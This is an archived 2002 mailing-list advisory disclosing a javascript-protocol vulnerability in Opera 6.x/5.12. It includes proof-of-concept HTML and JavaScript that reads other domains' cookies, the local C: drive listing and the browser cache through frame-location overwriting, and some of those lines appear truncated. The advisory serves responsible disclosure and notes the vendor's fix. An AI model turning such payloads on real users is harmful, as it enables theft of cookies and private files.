Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
From: Andreas Sandblad (sandbladacc.umu.se)
Date: Wed May 15 2002 - 11:57:59 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

                      - Sandblad advisory #6 -

    Title: Opera javascript protocoll vulnerability
    Date: [2002-05-15]
    Software: At least Opera 6.01, 6.0, 5.12 (win)
    Rating: High because Opera is assumed to be secure
    Impact: Read cookies/local filestructure/cache
    Vendor: Opera has confirmed the vulnerability and released
                today a new version 6.02 fixing the issue.
                http://www.opera.com/ _ _
    Workaround: Disable javascript. o' \,=./ `o
    Author: Andreas Sandblad, sandbladacc.umu.se (o o)

    Opera allows the location of a frame to be overwritten by an url
    containing the javascript protocoll. The javascript code will be operating
    in the same domain as the url that was overwritten. Thus we can read
    cookies from other domains, local file structure and private information
    from the cache (history of links visited).

    The following exploit has been tested to work on Opera 6.01, 6.0 (win). It
    will not work on 5.x because it requires the iframe feature.

    ------------------- CUT HERE -----------------------------------
    <iframe name=cookie src="http://www.google.com/" height=0
    <iframe name=files src="file://c:/" height=0 width=0></iframe>
    <iframe name=cache src="opera:cache" height=0 width=0></iframe><br>
    <a href="javascript:readCookie()">Read google cookie</a><br>
    <a href="javascript:readFiles()">Read c:/ structure (win)</a><br>
    <a href="javascript:readCache()">Read links in cache</a><br>
    function readCookie(){
    function readFiles(){
      t = 'javascript:s="";l=document.links;';
      t+= 'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);';
      files.location = t;
    function readCache(){
      t = 'javascript:s="";l=document.links;';
      t+= 'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);';
      cache.location = t;
    ------------------- CUT HERE -----------------------------------

    For versions of Opera not supporting the iframe tag the exploit must be
    done using the frame tag instead. The following exploit has been tested on
    Opera 6.01, 6.0, 5.12 (win).

    ------------------- CUT HERE -----------------------------------
    <FRAMESET ROWS="100%,0,0,0">
    <FRAME SRC="payload.html">
    <FRAME NAME="cache" src="opera:cache" noresize>
    <FRAME NAME="files" src="file:///c:/" noresize>
    <FRAME NAME="cookie" src="http://www.google.com/" noresize>
    ------------------- CUT HERE -----------------------------------
    ------------------- CUT HERE -----------------------------------
    <a href="javascript:alert(document.cookie)" target="cookie">Google
    <a href="javascript:alert(document.links.item(0))" target="cache">First
    item in cache</a><br>
    <a href="javascript:alert(document.links.item(1))" target="files">First
    file/directory in c:\ (win)</a>
    ------------------- CUT HERE -----------------------------------

    Andreas Sandblad is not responsible for the misuse of the
    information provided in this advisory. The opinions expressed
    are my own and not of any company. In no event shall the author
    be liable for any damages whatsoever arising out of or in
    connection with the use or spread of this advisory. Any use of
    the information is at the user's own risk.

    Old advisories:
    #5 [2002-04-26] "Mp3 file can execute code in Winamp."
    #4 [2002-04-15] "Using the backbutton in IE is dangerous."

    Please send suggestions and comments to: _ _
    sandbladacc.umu.se o' \,=./ `o
                                                        (o o)
    Andreas Sandblad,
    student in Engineering Physics at the University of Umea, Sweden.